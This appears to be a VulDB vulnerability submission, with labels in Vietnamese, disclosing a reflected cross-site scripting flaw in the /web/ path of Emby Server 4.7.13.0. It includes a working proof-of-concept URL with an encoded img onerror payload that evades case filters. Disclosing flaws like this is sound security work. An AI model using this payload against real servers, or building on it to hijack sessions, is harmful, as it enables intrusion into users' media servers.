| tiêu đề | Reflected Cross-Site Scripting (XSS) in Emby |
|---|
| Mô tả | # Vulnerability Description
I found a Reflected Cross-Site Scripting (XSS) in the latest version of Emby server version x.x.x.x
official address:
https://emby.media/
[https://github.com/MediaBrowser/Emby.Releases](https://github.com/MediaBrowser/Emby.Releases/releases/download/x.x.x.x/embyserver-win-x64-4.7.13.0.7z)
# Vulnerability Details
Everything after /web/ is reflected. See the attachments for an example:
```
http://<ip>:<port>/web/%3Cimg%20sRc=l%20oNerrOr=alert('xss')%20x%3E
```
 |
|---|
| Nguồn | ⚠️ https://github.com/whoamiecho/vuls/blob/main/emby.md |
|---|
| Người dùng | whoamiechor (UID 51354) |
|---|
| Đệ trình | 23/07/2023 16:59 (cách đây 3 những năm) |
|---|
| Kiểm duyệt | 04/08/2023 23:04 (12 days later) |
|---|
| Trạng thái | được chấp nhận |
|---|
| Mục VulDB | 236183 [Media Browser Emby Server 4.7.13.0 /web/ Tập lệnh chéo trang] |
|---|
| điểm | 20 |
|---|